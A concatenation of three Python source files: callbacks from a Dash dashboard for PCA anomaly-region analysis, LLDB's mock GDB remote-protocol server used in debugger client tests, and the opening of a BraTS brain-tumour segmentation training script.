        DataPCA, Ts, Qs, Variances = PCA.PCA(df, PCA_NPCA, window)
        RegionsAll, _, _, _ = PCA.PCARegionsCollect(Ts, Qs, dtMeasure, PCA_AlphaLim, PCA_NPCA, TestCol)
        # Just care about time periods
        PCAStats = CalcStats.CalcPCAStats(Ts, Qs, PCA_NPCA, Variances, RegionsAll)
        return "Run", DataPCA.to_json(date_format='iso', orient='split'), Ts.to_json(date_format='iso', orient='split'), Qs.to_json(date_format='iso', orient='split'), json.dumps(WindowParameters), json.dumps(PCAStats), ""
#######################
# Graphing
#######################
@app.callback(
    [Output('PCAGraph', 'figure'), Output('RatesGraph', 'figure')],
    [Input("PCATestFeature-dropdown", "value"), Input("PCAData", "children"), Input("PCATsData", "children"), Input("PCAQsData", "children")],
    [State("DataSummary", "children"), State('PCATypeSelect', 'value'), State('PCAStrSearch', "value")]
)
def update_graph(MarginalFeature, DataPCA, Ts, Qs, WindowParameters, Type, StringSearch):
    '''
    Plot the PCA feature graph and the rolling-rates graph.

    Parameters:
        MarginalFeature (str): Feature to plot marginalised
        DataPCA (json): jsonified PCA data
        Ts (json): jsonified Ts data
        Qs (json): jsonified Q data
        WindowParameters (json): summary of raw data
        Type (str): "Alpha" "Raw" "BOCPD"
        StringSearch (str): Search string
    Returns:
        PCAGraph (dcc.graph): Graph of PCA features
        RatesGraph (dcc.graph): Graph of rolling rates
    '''
    if Ts in [None, "", "0", 0] or Qs in [None, "", "0", 0]:
        # No PCA results yet: render placeholder figures.
        return DashPlots.EmptyFig(FigHeightPX/3), DashPlots.EmptyFig(2*FigHeightPX/3)
    else:
        DataPCA = pd.read_json(DataPCA, orient='split')
        Ts = pd.read_json(Ts, orient='split')
        Qs = pd.read_json(Qs, orient='split')
        WindowParameters = json.loads(WindowParameters)
        # Fall back to the first PCA column when the requested marginal
        # feature is not part of the decomposition.
        if MarginalFeature not in DataPCA.columns:
            TestCol = DataPCA.columns[0]
        else:
            TestCol = MarginalFeature
        PCA_NPCA, PCA_AlphaLim, PCA_Thresh = Misc.GetOptimzed(PCA_FittedParams, Type, StringSearch, DefaultMetric, DataPCA.columns)
        # NOTE(review): NDur = -1 appears to alter region-duration handling
        # for BOCPD input — confirm against PCA.PCARegionsCollect.
        NDur = 0
        if Type == "BOCPD":
            NDur = -1
        dtMeasure = Misc.timedeltaOneUnit(WindowParameters["Rate"], WindowParameters["RateUnit"])
        RegionsAll, RegionsSpecific, RatesAll, RatesSpecific = PCA.PCARegionsCollect(Ts, Qs, dtMeasure, PCA_AlphaLim, PCA_NPCA, TestCol, NDur)
        if MarginalFeature not in [None]:
            FigPCA = DashPlots.CreatePCADataFig(DataPCA, RegionsAll, RegionsSpecific, MarginalFeature, NDur, int(FigHeightPX/3))
            FigRates = DashPlots.CreateRatesFig("Rate", PCA_Thresh, RatesAll, RatesSpecific, RegionsAll, RegionsSpecific, MarginalFeature, NDur, int(2*FigHeightPX/3))
        else:
            # Without a marginal feature the "specific" overlays are passed as 0.
            FigPCA = DashPlots.CreatePCADataFig(DataPCA, RegionsAll, 0, MarginalFeature, NDur, int(FigHeightPX/3))
            FigRates = DashPlots.CreateRatesFig("Rate", PCA_Thresh, RatesAll, RatesSpecific, RegionsAll, 0, MarginalFeature, NDur, int(2*FigHeightPX/3))
        if SaveFigs == 1 and len(DataPCA.columns) < 6:
            # Export a matplotlib copy in a separate child process
            # (presumably to keep matplotlib out of the Dash server process —
            # confirm).
            Name = ""
            for V in DataPCA.columns:
                Name += V
            XRange = [DataPCA.index[0], DataPCA.index[-1]]
            NameDate = "_%s_%s" % (XRange[0].strftime("%d%m%Y"), XRange[-1].strftime("%d%m%Y"))
            p1 = Process(target=Graphing.plotMATPLOTLIBPCA, args=[DataPCA, Ts, Qs, XRange, [1e-16, 2], [PCA_AlphaLim], RegionsAll, RegionsSpecific, "cachefiles"+os.sep+"PCA", Name+NameDate, True])
            p1.start()
            p1.join()
        return FigPCA, FigRates
#######################
# Summary stats
#######################
@app.callback(
    Output('PCATable', 'children'),
    [Input("DataSummary", "children"), Input("PCADataSummary", "children")]
)
def update_graph(Parameters, PCAStats):
    '''
    Fill the PCA summary column from the two jsonified stat blobs.

    Parameters:
        Parameters (json): Parameters summarising the raw data
        PCAStats (json): Parameters summarising the PCA data
    Returns:
        Dict (dict): Summary table children
    '''
    raw_summary = json.loads(Parameters)
    pca_summary = json.loads(PCAStats)
    return build_PCAdatasummary(raw_summary, pca_summary)
#######################
# Cache
#######################
@app.callback(
    Output("JSON_Cache_Output", "children"),
    [Input("PCADataSummary", "children")],
    [State("DataSummary", "children"), State('PCARun', 'n_clicks'), State('PCATypeSelect', 'value'), State('PCAColName-dropdown', 'value'), State("PCATsData", "children"), State("PCAQsData", "children"), State('PCAStrSearch', "value")],
)
def update_graph(PCAStats, WinPara, n_clicks, Type, Vars, Ts, Qs, StringSearch):
    '''
    Write a JSON cache file summarising the latest PCA run.

    Parameters:
        PCAStats (json): summary of PCA data
        WinPara (json): summary of raw data
        n_clicks (int): Number of clicks on the run button
        Type (str): "Alpha" "Raw" "BOCPD"
        Vars (list): List of features
        Ts (json): jsonified Ts data
        Qs (json): jsonified Q data
        StringSearch (str): Search string
    Returns:
        A (int): 0
    '''
    if SaveCache == 0:
        return 0
    if Ts in [None, 0, "0", "None", ""]:
        return 0
    # Guard: the previous `n_clicks not in [None] or Vars not in [None]`
    # check allowed Vars to be None when the button had been clicked, so the
    # subsequent len(Vars) raised TypeError. Bail out on missing/empty Vars.
    if Vars is None or len(Vars) == 0:
        return 0
    PCAStats = json.loads(PCAStats)
    WinPara = json.loads(WinPara)
    Ts = pd.read_json(Ts, orient='split')
    Qs = pd.read_json(Qs, orient='split')
    PCA_NPCA, PCA_AlphaLim, PCA_Thresh = Misc.GetOptimzed(PCA_FittedParams, Type, StringSearch, DefaultMetric, Vars)
    dtMeasure = Misc.timedeltaOneUnit(WinPara["Rate"], WinPara["RateUnit"])
    RegionsAll, _, _, _ = PCA.PCARegionsCollect(Ts, Qs, dtMeasure, PCA_AlphaLim, PCA_NPCA, 0)
    # Collect human-readable start/end/duration strings for every region.
    STARTS = []
    ENDS = []
    DURATIONS = []
    for Ri in range(RegionsAll.shape[0]):
        STARTS.append(Misc.unixToDatetime(RegionsAll.iloc[Ri]["Starts"]).strftime('%d/%m/%Y %H:%M:%S'))
        ENDS.append(Misc.unixToDatetime(RegionsAll.iloc[Ri]["Stops"]).strftime('%d/%m/%Y %H:%M:%S'))
        DURATIONS.append("%s" % RegionsAll.iloc[Ri]["Duration"])
    Name = "PCA"
    FileName = "cachefiles" + os.sep + "%s.json" % (Name)
    data_i = {}
    WinPara["Start"] = "%s" % Misc.unixToDatetime(WinPara["Start"]).strftime('%d/%m/%Y %H:%M:%S')
    WinPara["End"] = "%s" % Misc.unixToDatetime(WinPara["End"]).strftime('%d/%m/%Y %H:%M:%S')
    data_i["Time"] = "%s" % datetime.now().strftime('%d/%m/%Y %H:%M:%S')
    data_i["Type"] = Type
    data_i["Features"] = Vars
    data_i["Stats"] = WinPara
    data_i["PCAStats"] = PCAStats
    data_i["Regions"] = []
    data_i["Regions"].append({"Starts": STARTS})
    data_i["Regions"].append({"End": ENDS})
    data_i["Regions"].append({"Duration": DURATIONS})
    DatM.WriteCacheFile(FileName, data_i)
    return 0
#######################
# Reset Folders data
#######################
def EmptyFolders():
    '''
    Delete locally generated analysis spreadsheets and cache files.

    Parameters:
    Returns:
        A (int): 1 once all matching files have been removed
    '''
    import glob
    patterns = (
        'data' + os.sep + '*' + os.sep + '*.xlsx',
        'cachefiles' + os.sep + '*' + os.sep + '*.png',
        'cachefiles' + os.sep + '*.json',
    )
    for pattern in patterns:
        for path in glob.glob(pattern):
            print("Deleting %s" % path)
            os.remove(path)
    return 1
#######################
# argv
#######################
def main(argv):
    '''
    Parse command-line options for the dashboard.

    Parameters:
        argv (list): Python terminal input args (sys.argv[1:])
    Returns:
        Delete (bool): True when -D/--Delete was passed (reset folder data)
    '''
    # Default parameters
    Delete = False
    try:
        # Fixes: "h" was missing from the option string, so -h raised
        # GetoptError instead of printing usage; "Delete=" wrongly required
        # an argument, and --Delete was silently ignored by the loop below.
        opts, args = getopt.getopt(argv, "hD", ["Delete"])
    except getopt.GetoptError:
        print('python app.py -D')
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print('python app.py -D')
            sys.exit()
        elif opt in ("-D", "--Delete"):
            Delete = True
    return Delete
if __name__ == "__main__":
    # Parse CLI flags; -D wipes previously generated data and cache files
    # before the server starts.
    Delete = main(sys.argv[1:])
    if Delete:
        EmptyFolders()
    print("Run app dashboard")
    # Callbacks reference components created dynamically in tabs, so
    # suppress Dash's missing-component validation.
    app.config.suppress_callback_exceptions = True
    #Run as debug mode
    app.run_server(debug=True, port=8050, threaded= True)
    #Run normally
    #app.run_server(host= "0.0.0.0", port=8050, threaded= True)
|
gdbclientutils.py | import os
import os.path
import threading
import socket
import lldb
import binascii
import traceback
from lldbsuite.support import seven
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbtest_config
def checksum(message):
    """
    Compute the GDB server protocol checksum of the message.

    The protocol defines the checksum as the sum of all character values,
    modulo 256.
    """
    return sum(ord(ch) for ch in message) % 256
def frame_packet(message):
    """
    Create a framed packet that's ready to send over the GDB connection
    channel.

    The payload is enclosed between '$' and '#' and followed by a
    two-character lowercase hex checksum (sum of bytes mod 256).
    """
    total = sum(ord(ch) for ch in message) % 256
    return "$%s#%02x" % (message, total)
def escape_binary(message):
    """
    Escape the binary message using the process described in the GDB server
    protocol documentation.

    Most bytes pass through as-is, but '#' (0x23), '$' (0x24) and '}' (0x7d)
    are emitted as a '}' followed by the original byte XORed with 0x20.
    """
    escaped = []
    for ch in message:
        code = ord(ch)
        if code in (0x23, 0x24, 0x7d):
            escaped.append(chr(0x7d))
            escaped.append(chr(code ^ 0x20))
        else:
            escaped.append(ch)
    return "".join(escaped)
def hex_encode_bytes(message):
    """
    Encode the binary message by converting each byte into a two-character
    hex string.
    """
    return "".join("%02x" % ord(ch) for ch in message)
def hex_decode_bytes(hex_bytes):
    """
    Decode the hex string into a binary message by converting each
    two-character hex string into a single output byte.

    A trailing odd nibble is ignored.
    """
    out = ""
    # Fixes: `i` was never initialized (NameError on first use), and the
    # base argument was passed to chr() instead of int():
    # chr(int(s), 16) -> chr(int(s, 16)).
    i = 0
    hex_len = len(hex_bytes)
    while i < hex_len - 1:
        out += chr(int(hex_bytes[i:i + 2], 16))
        i += 2
    return out
class MockGDBServerResponder:
    """
    A base class for handling client packets and issuing server responses for
    GDB tests.

    This handles many typical situations, while still allowing subclasses to
    completely customize their responses.

    Most subclasses will be interested in overriding the other() method, which
    handles any packet not recognized in the common packet handling code.
    """

    registerCount = 40
    packetLog = None  # shadowed by a per-instance list in __init__

    def __init__(self):
        self.packetLog = []

    def respond(self, packet):
        """
        Return the unframed packet data that the server should issue in response
        to the given packet received from the client.
        """
        self.packetLog.append(packet)
        if packet is MockGDBServer.PACKET_INTERRUPT:
            return self.interrupt()
        if packet == "c":
            return self.cont()
        if packet.startswith("vCont;c"):
            return self.vCont(packet)
        if packet[0] == "A":
            return self.A(packet)
        if packet[0] == "g":
            return self.readRegisters()
        if packet[0] == "G":
            # Gxxxxxxxxxxx
            # Gxxxxxxxxxxx;thread:1234;
            return self.writeRegisters(packet[1:].split(';')[0])
        if packet[0] == "p":
            regnum = packet[1:].split(';')[0]
            return self.readRegister(int(regnum, 16))
        if packet[0] == "P":
            register, value = packet[1:].split("=")
            return self.writeRegister(int(register, 16), value)
        if packet[0] == "m":
            addr, length = [int(x, 16) for x in packet[1:].split(',')]
            return self.readMemory(addr, length)
        if packet[0] == "M":
            location, encoded_data = packet[1:].split(":")
            addr, length = [int(x, 16) for x in location.split(',')]
            return self.writeMemory(addr, encoded_data)
        if packet[0:7] == "qSymbol":
            return self.qSymbol(packet[8:])
        if packet[0:10] == "qSupported":
            return self.qSupported(packet[11:].split(";"))
        if packet == "qfThreadInfo":
            return self.qfThreadInfo()
        if packet == "qsThreadInfo":
            return self.qsThreadInfo()
        if packet == "qC":
            return self.qC()
        if packet == "QEnableErrorStrings":
            return self.QEnableErrorStrings()
        if packet == "?":
            return self.haltReason()
        if packet == "s":
            return self.haltReason()
        if packet[0] == "H":
            return self.selectThread(packet[1], int(packet[2:], 16))
        if packet[0:6] == "qXfer:":
            obj, read, annex, location = packet[6:].split(":")
            offset, length = [int(x, 16) for x in location.split(',')]
            data, has_more = self.qXferRead(obj, annex, offset, length)
            if data is not None:
                return self._qXferResponse(data, has_more)
            return ""
        if packet.startswith("vAttach;"):
            pid = packet.partition(';')[2]
            return self.vAttach(int(pid, 16))
        if packet[0] == "Z":
            return self.setBreakpoint(packet)
        if packet.startswith("qThreadStopInfo"):
            threadnum = int(packet[15:], 16)
            return self.threadStopInfo(threadnum)
        if packet == "QThreadSuffixSupported":
            return self.QThreadSuffixSupported()
        if packet == "QListThreadsInStopReply":
            return self.QListThreadsInStopReply()
        if packet.startswith("qMemoryRegionInfo:"):
            return self.qMemoryRegionInfo()
        if packet == "qQueryGDBServer":
            return self.qQueryGDBServer()
        if packet == "qHostInfo":
            return self.qHostInfo()
        if packet == "qGetWorkingDir":
            return self.qGetWorkingDir()
        if packet == "qOffsets":
            return self.qOffsets()
        if packet == "qsProcessInfo":
            return self.qsProcessInfo()
        if packet.startswith("qfProcessInfo"):
            return self.qfProcessInfo(packet)
        # Fall through to the subclass-customizable hook.
        return self.other(packet)

    def qsProcessInfo(self):
        return "E04"

    def qfProcessInfo(self, packet):
        return "E04"

    def qGetWorkingDir(self):
        # "2f" is hex for "/".
        return "2f"

    def qOffsets(self):
        return ""

    def qHostInfo(self):
        return "ptrsize:8;endian:little;"

    def qQueryGDBServer(self):
        return "E04"

    def interrupt(self):
        raise self.UnexpectedPacketException()

    def cont(self):
        raise self.UnexpectedPacketException()

    def vCont(self, packet):
        raise self.UnexpectedPacketException()

    def A(self, packet):
        return ""

    def readRegisters(self):
        return "00000000" * self.registerCount

    def readRegister(self, register):
        return "00000000"

    def writeRegisters(self, registers_hex):
        return "OK"

    def writeRegister(self, register, value_hex):
        return "OK"

    def readMemory(self, addr, length):
        return "00" * length

    def writeMemory(self, addr, data_hex):
        return "OK"

    def qSymbol(self, symbol_args):
        return "OK"

    def qSupported(self, client_supported):
        return "qXfer:features:read+;PacketSize=3fff;QStartNoAckMode+"

    def qfThreadInfo(self):
        return "l"

    def qsThreadInfo(self):
        return "l"

    def qC(self):
        return "QC0"

    def QEnableErrorStrings(self):
        return "OK"

    def haltReason(self):
        # SIGINT is 2, return type is 2 digit hex string
        return "S02"

    def qXferRead(self, obj, annex, offset, length):
        return None, False

    def _qXferResponse(self, data, has_more):
        return "%s%s" % ("m" if has_more else "l", escape_binary(data))

    def vAttach(self, pid):
        raise self.UnexpectedPacketException()

    def selectThread(self, op, thread_id):
        return "OK"

    def setBreakpoint(self, packet):
        raise self.UnexpectedPacketException()

    def threadStopInfo(self, threadnum):
        return ""

    def other(self, packet):
        # empty string means unsupported
        return ""

    def QThreadSuffixSupported(self):
        return ""

    def QListThreadsInStopReply(self):
        return ""

    def qMemoryRegionInfo(self):
        return ""

    class UnexpectedPacketException(Exception):
        # This docstring previously sat as a no-op bare string *before* the
        # class definition, where it documented nothing; moved here so it is
        # attached to the exception.
        """
        Raised when we receive a packet for which there is no default action.
        Override the responder class to implement behavior suitable for the test at
        hand.
        """
        pass
class MockGDBServer:
    """
    A simple TCP-based GDB server that can test client behavior by receiving
    commands and issuing custom-tailored responses.

    Responses are generated via the .responder property, which should be an
    instance of a class based on MockGDBServerResponder.
    """

    responder = None            # MockGDBServerResponder generating replies
    port = 0                    # TCP port; 0 lets the OS pick a free one
    _socket = None              # listening socket
    _client = None              # accepted client connection
    _thread = None              # background accept/receive thread
    _receivedData = None        # unparsed bytes received so far
    _receivedDataOffset = None  # resume point for partial-packet parsing
    _shouldSendAck = True       # whether packets should be ack'd ('+')
    def __init__(self, port = 0):
        # Default responder; tests typically replace .responder with a
        # customized MockGDBServerResponder subclass.
        self.responder = MockGDBServerResponder()
        self.port = port
        self._socket = socket.socket()
    def start(self):
        """Bind and listen, then accept a client on a background thread."""
        # Block until the socket is up, so self.port is available immediately.
        # Then start a thread that waits for a client connection.
        addr = ("127.0.0.1", self.port)
        self._socket.bind(addr)
        # Re-read the port: if self.port was 0 the OS assigned a free one.
        self.port = self._socket.getsockname()[1]
        self._socket.listen(1)
        self._thread = threading.Thread(target=self._run)
        self._thread.start()
    def stop(self):
        """Shut the server down and wait for its thread to finish."""
        # Closing the listening socket makes the accept() in _run() fail
        # (via its timeout), letting the server thread exit so it can be
        # joined.
        self._socket.close()
        self._thread.join()
        self._thread = None
    def _run(self):
        """Accept one client and pump its packets until the connection drops."""
        # For testing purposes, we only need to worry about one client
        # connecting just one time.
        try:
            # accept() is stubborn and won't fail even when the socket is
            # shutdown, so we'll use a timeout
            self._socket.settimeout(20.0)
            client, client_addr = self._socket.accept()
            self._client = client
            # The connected client inherits its timeout from self._socket,
            # but we'll use a blocking socket for the client
            self._client.settimeout(None)
        except:
            # Accept failed or timed out (e.g. stop() closed the socket).
            return
        # Fresh protocol state for the new connection.
        self._shouldSendAck = True
        self._receivedData = ""
        self._receivedDataOffset = 0
        data = None
        while True:
            try:
                data = seven.bitcast_to_string(self._client.recv(4096))
                if data is None or len(data) == 0:
                    # Peer closed the connection.
                    break
                self._receive(data)
            except Exception as e:
                print("An exception happened when receiving the response from the gdb server. Closing the client...")
                traceback.print_exc()
                self._client.close()
                break
    def _receive(self, data):
        """
        Collects data, parses and responds to as many packets as exist.
        Any leftover data is kept for parsing the next time around.
        """
        self._receivedData += data
        try:
            # Drain every complete packet currently buffered; a partial
            # packet makes _parsePacket() return None and stops the loop.
            packet = self._parsePacket()
            while packet is not None:
                self._handlePacket(packet)
                packet = self._parsePacket()
        except self.InvalidPacketException:
            # Framing/checksum error: drop the client rather than guess.
            self._client.close()
    def _parsePacket(self):
        """
        Reads bytes from self._receivedData, returning:
        - a packet's contents if a valid packet is found
        - the PACKET_ACK unique object if we got an ack
        - None if we only have a partial packet

        Raises an InvalidPacketException if unexpected data is received
        or if checksums fail.

        Once a complete packet is found at the front of self._receivedData,
        its data is removed from self._receivedData.
        """
        data = self._receivedData
        i = self._receivedDataOffset
        data_len = len(data)
        if data_len == 0:
            return None
        if i == 0:
            # If we're looking at the start of the received data, that means
            # we're looking for the start of a new packet, denoted by a $.
            # It's also possible we'll see an ACK here, denoted by a +
            if data[0] == '+':
                self._receivedData = data[1:]
                return self.PACKET_ACK
            # A raw 0x03 byte is the gdb-remote interrupt (Ctrl-C), sent
            # outside normal $...#xx framing.
            if ord(data[0]) == 3:
                self._receivedData = data[1:]
                return self.PACKET_INTERRUPT
            if data[0] == '$':
                i += 1
            else:
                raise self.InvalidPacketException(
                    "Unexpected leading byte: %s" % data[0])
        # If we're looking beyond the start of the received data, then we're
        # looking for the end of the packet content, denoted by a #.
        # Note that we pick up searching from where we left off last time
        while i < data_len and data[i] != '#':
            i += 1
        # If there isn't enough data left for a checksum, just remember where
        # we left off so we can pick up there the next time around
        if i > data_len - 3:
            self._receivedDataOffset = i
            return None
        # If we have enough data remaining for the checksum, extract it and
        # compare to the packet contents
        packet = data[1:i]
        i += 1
        try:
            # Two hex digits immediately after '#' carry the checksum.
            check = int(data[i:i + 2], 16)
        except ValueError:
            raise self.InvalidPacketException("Checksum is not valid hex")
        i += 2
        if check != checksum(packet):
            raise self.InvalidPacketException(
                "Checksum %02x does not match content %02x" %
                (check, checksum(packet)))
        # remove parsed bytes from _receivedData and reset offset so parsing
        # can start on the next packet the next time around
        self._receivedData = data[i:]
        self._receivedDataOffset = 0
        return packet
    def _handlePacket(self, packet):
        # Dispatch one parsed packet: acks and no-ack negotiation are handled
        # here; everything else is delegated to self.responder, and the reply
        # is framed and sent back to the client.
        if packet is self.PACKET_ACK:
            # Ignore ACKs from the client. For the future, we can consider
            # adding validation code to make sure the client only sends ACKs
            # when it's supposed to.
            return
        response = ""
        # We'll handle the ack stuff here since it's not something any of the
        # tests will be concerned about, and it'll get turned off quickly anyway.
        if self._shouldSendAck:
            self._client.sendall(seven.bitcast_to_bytes('+'))
        if packet == "QStartNoAckMode":
            self._shouldSendAck = False
            response = "OK"
        elif self.responder is not None:
            # Delegate everything else to our responder
            response = self.responder.respond(packet)
        # Handle packet framing since we don't want to bother tests with it.
        if response is not None:
            framed = frame_packet(response)
            self._client.sendall(seven.bitcast_to_bytes(framed))
    # Unique sentinel objects returned by _parsePacket for input that is not
    # a framed packet: a '+' ack and a raw 0x03 interrupt byte respectively.
    PACKET_ACK = object()
    PACKET_INTERRUPT = object()

    class InvalidPacketException(Exception):
        # Raised by _parsePacket on malformed framing or a checksum mismatch.
        pass
class GDBRemoteTestBase(TestBase):
    """
    Base class for GDB client tests.

    This class will setup and start a mock GDB server for the test to use.
    It also provides assertPacketLogContains, which simplifies the checking
    of packets sent by the client.
    """

    NO_DEBUG_INFO_TESTCASE = True
    mydir = TestBase.compute_mydir(__file__)
    server = None  # MockGDBServer instance, created fresh per test in setUp

    def setUp(self):
        TestBase.setUp(self)
        self.server = MockGDBServer()
        self.server.start()

    def tearDown(self):
        # TestBase.tearDown will kill the process, but we need to kill it early
        # so its client connection closes and we can stop the server before
        # finally calling the base tearDown.
        if self.process() is not None:
            self.process().Kill()
        self.server.stop()
        TestBase.tearDown(self)

    def createTarget(self, yaml_path):
        """
        Create a target by auto-generating the object based on the given yaml
        instructions.

        This will track the generated object so it can be automatically removed
        during tearDown.
        """
        yaml_base, ext = os.path.splitext(yaml_path)
        obj_path = self.getBuildArtifact(yaml_base)
        self.yaml2obj(yaml_path, obj_path)
        return self.dbg.CreateTarget(obj_path)

    def connect(self, target):
        """
        Create a process by connecting to the mock GDB server.

        Includes assertions that the process was successfully created.
        """
        listener = self.dbg.GetListener()
        error = lldb.SBError()
        url = "connect://localhost:%d" % self.server.port
        process = target.ConnectRemote(listener, url, "gdb-remote", error)
        self.assertTrue(error.Success(), error.description)
        self.assertTrue(process, PROCESS_IS_VALID)
        return process

    def assertPacketLogContains(self, packets):
        """
        Assert that the mock server's packet log contains the given packets.

        The packet log includes all packets sent by the client and received
        by the server. This function makes it easy to verify that the client
        sent the expected packets to the server.

        The check does not require that the packets be consecutive, but does
        require that they are ordered in the log as they are ordered in the arg.
        """
        i = 0
        j = 0
        log = self.server.responder.packetLog
        # Scan the log once, advancing the expectation index only on a match.
        while i < len(packets) and j < len(log):
            if log[j] == packets[i]:
                i += 1
            j += 1
        if i < len(packets):
            self.fail(u"Did not receive: %s\nLast 10 packets:\n\t%s" %
                      (packets[i], u'\n\t'.join(log)))
|
train.py | import numpy as np
import tf_models
from sklearn.preprocessing import scale
import tensorflow as tf
from tensorflow.keras.backend import learning_phase
from tensorflow.keras.layers import concatenate, Conv3D
from nibabel import load as load_nii
import os
import argparse
import keras
import glob
import Queue
from threading import Thread # Thread OOMs out for some reason. Have to debug!!
import time
from partition_brats_dir import get_dataset_dirnames
def parse_inputs():
    """Parse command line arguments for training.

    Returns:
        dict: option name -> value for all training hyper-parameters.
    """
    def _str2bool(value):
        # BUG FIX: argparse's ``type=bool`` is a trap -- bool('False') is True
        # because any non-empty string is truthy, so ``-c False`` used to
        # enable continue-training.  Parse the text explicitly instead.
        return str(value).strip().lower() in ('1', 'true', 't', 'yes', 'y')

    parser = argparse.ArgumentParser(description='train the model')
    parser.add_argument('-r', '--root-path', dest='root_path', default='/media/lele/Data/spie/Brats17TrainingData/HGG')
    parser.add_argument('-sp', '--save-path', dest='save_path', default='dense24_correction')
    parser.add_argument('-ng', '--gpu-ids', dest='gpu_ids', default=[0], nargs='+', type=int)
    parser.add_argument('-lp', '--load-path', dest='load_path', default='dense24_correction')
    parser.add_argument('-ow', '--offset-width', dest='offset_w', type=int, default=12)
    parser.add_argument('-oh', '--offset-height', dest='offset_h', type=int, default=12)
    # NOTE(review): nargs='+' combined with a scalar default looks suspicious
    # for a single offset value -- confirm intended usage before changing.
    parser.add_argument('-oc', '--offset-channel', dest='offset_c', nargs='+', type=int, default=12)
    parser.add_argument('-ws', '--width-size', dest='wsize', type=int, default=38)
    parser.add_argument('-hs', '--height-size', dest='hsize', type=int, default=38)
    parser.add_argument('-cs', '--channel-size', dest='csize', type=int, default=38)
    parser.add_argument('-ps', '--pred-size', dest='psize', type=int, default=12)
    parser.add_argument('-bs', '--batch-size', dest='batch_size', type=int, default=2)
    parser.add_argument('-e', '--num-epochs', dest='num_epochs', type=int, default=5)
    parser.add_argument('-c', '--continue-training', dest='continue_training', type=_str2bool, default=False)
    parser.add_argument('-mn', '--model_name', dest='model_name', type=str, default='dense24')
    parser.add_argument('-nc', '--n4correction', dest='correction', type=_str2bool, default=False)
    return vars(parser.parse_args())
# Parse CLI options once at import time; module functions read this global.
options = parse_inputs()
def acc_tf(y_pred, y_true):
    """Accuracy (percent) between dense predictions and one-hot targets."""
    pred_ids = tf.cast(tf.argmax(y_pred, -1), tf.int32)
    true_ids = tf.cast(tf.argmax(y_true, -1), tf.int32)
    hits = tf.cast(tf.equal(pred_ids, true_ids), tf.float32)
    return 100 * tf.reduce_mean(hits)
def get_patches_3d(data, labels, centers, hsize, wsize, csize, psize, preprocess=True):
    """Extract input/label patch pairs centered (and clamped) at the given voxels.

    :param data: 4D nparray (h, w, c, modalities); assumed 240x240x155 spatially
    :param labels: 3D nparray of sparse labels
    :param centers: (3, N) array of patch-center coordinates
    :param hsize: input patch height
    :param wsize: input patch width
    :param csize: input patch depth (channel/slice axis)
    :param psize: label patch size (centered inside the input patch)
    :param preprocess: accepted for interface compatibility; currently unused
    :return: (N, hsize, wsize, csize, modalities) inputs and
             (N, psize, psize, psize) labels
    """
    patches_x, patches_y = [], []
    # BUG FIX: use floor division.  Plain "/" produced float offsets under
    # Python 3, which then fail as slice indices; "//" is identical to the
    # original behavior under Python 2.
    offset_p = (hsize - psize) // 2
    for i in range(len(centers[0])):
        h, w, c = centers[0, i], centers[1, i], centers[2, i]
        # Clamp the patch so it stays inside the 240x240x155 BraTS volume.
        h_beg = min(max(0, h - hsize // 2), 240 - hsize)
        w_beg = min(max(0, w - wsize // 2), 240 - wsize)
        c_beg = min(max(0, c - csize // 2), 155 - csize)
        # The label patch sits centered within the input patch.
        ph_beg = h_beg + offset_p
        pw_beg = w_beg + offset_p
        pc_beg = c_beg + offset_p
        vox = data[h_beg:h_beg + hsize, w_beg:w_beg + wsize, c_beg:c_beg + csize, :]
        vox_labels = labels[ph_beg:ph_beg + psize, pw_beg:pw_beg + psize, pc_beg:pc_beg + psize]
        patches_x.append(vox)
        patches_y.append(vox_labels)
    return np.array(patches_x), np.array(patches_y)
def positive_ratio(x):
    """Return the fraction of strictly positive entries in array x."""
    positive_count = (x > 0).sum()
    return float(positive_count) / x.size
def norm(image):
    """Z-score an image using mean/std of its nonzero voxels only.

    Zero (background) voxels are excluded from the statistics but are still
    shifted/scaled in the output.
    """
    image = np.squeeze(image)
    nonzero_values = image[np.nonzero(image)]
    mu = nonzero_values.mean()
    sigma = nonzero_values.std()
    return (image - mu) / sigma
def segmentation_loss(y_true, y_pred, n_classes):
    """Mean softmax cross-entropy over all voxels (one-hot labels vs logits)."""
    flat_true = tf.reshape(y_true, (-1, n_classes))
    flat_logits = tf.reshape(y_pred, (-1, n_classes))
    per_voxel = tf.nn.softmax_cross_entropy_with_logits(labels=flat_true,
                                                        logits=flat_logits)
    return tf.reduce_mean(per_voxel)
def vox_preprocess(vox):
    """Standardize voxel features per channel, preserving the input shape."""
    original_shape = vox.shape
    flattened = np.reshape(vox, (-1, original_shape[-1]))
    standardized = scale(flattened, axis=0)
    return np.reshape(standardized, original_shape)
def one_hot(y, num_classes):
    """Return a (len(y), num_classes) float one-hot array for integer labels y."""
    eye = np.identity(num_classes)
    return eye[np.asarray(y)]
def dice_coef_np(y_true, y_pred, num_classes):
    """
    Per-class Dice coefficient between two sparse label volumes.

    :param y_true: sparse labels
    :param y_pred: sparse labels
    :param num_classes: number of classes
    :return: array of length num_classes with one Dice score per class
    """
    true_onehot = one_hot(y_true.astype(int).flatten(), num_classes)
    pred_onehot = one_hot(y_pred.astype(int).flatten(), num_classes)
    intersection = np.sum(true_onehot * pred_onehot, axis=0)
    denominator = np.sum(true_onehot, axis=0) + np.sum(pred_onehot, axis=0)
    return (2. * intersection) / denominator
def vox_generator(all_files, n_pos, n_neg):
    # Infinite generator over patients: yields (normalized_data, labels,
    # shuffled patch centers) where centers mixes n_pos tumor voxels and
    # n_neg background voxels per patient.
    path = options['root_path']
    while 1:
        for file in all_files:
            # Locate the four modality volumes inside the patient directory;
            # the *_corrected variants are N4 bias-field corrected images.
            coll = glob.glob(os.path.join(path, file)+'/*')
            for c in coll:
                if 'flair.' in c or 'flair_corrected.' in c:
                    flair_path = c
                if 't1.' in c or 't1_corrected.' in c:
                    t1_path = c
                if 't2.' in c or 't2_corrected.' in c:
                    t2_path = c
                if 't1ce.'in c or 't1ce_corrected.' in c:
                    t1ce_path = c
            flair = load_nii(flair_path).get_data()
            t2 = load_nii(t2_path).get_data()
            t1 = load_nii(t1_path).get_data()
            t1ce = load_nii(t1ce_path).get_data()
            # Stack modalities channel-last: (h, w, slices, 4).
            data_norm = np.array([norm(flair), norm(t2), norm(t1), norm(t1ce)])
            data_norm = np.transpose(data_norm, axes=[1, 2, 3, 0])
            labels = load_nii(os.path.join(path, file, file+'_seg.nii.gz')).get_data()
            # Sample patch centers: positives from tumor voxels, negatives
            # from non-tumor voxels inside the brain (flair > 0).
            foreground = np.array(np.where(labels > 0))
            background = np.array(np.where((labels == 0) & (flair > 0)))
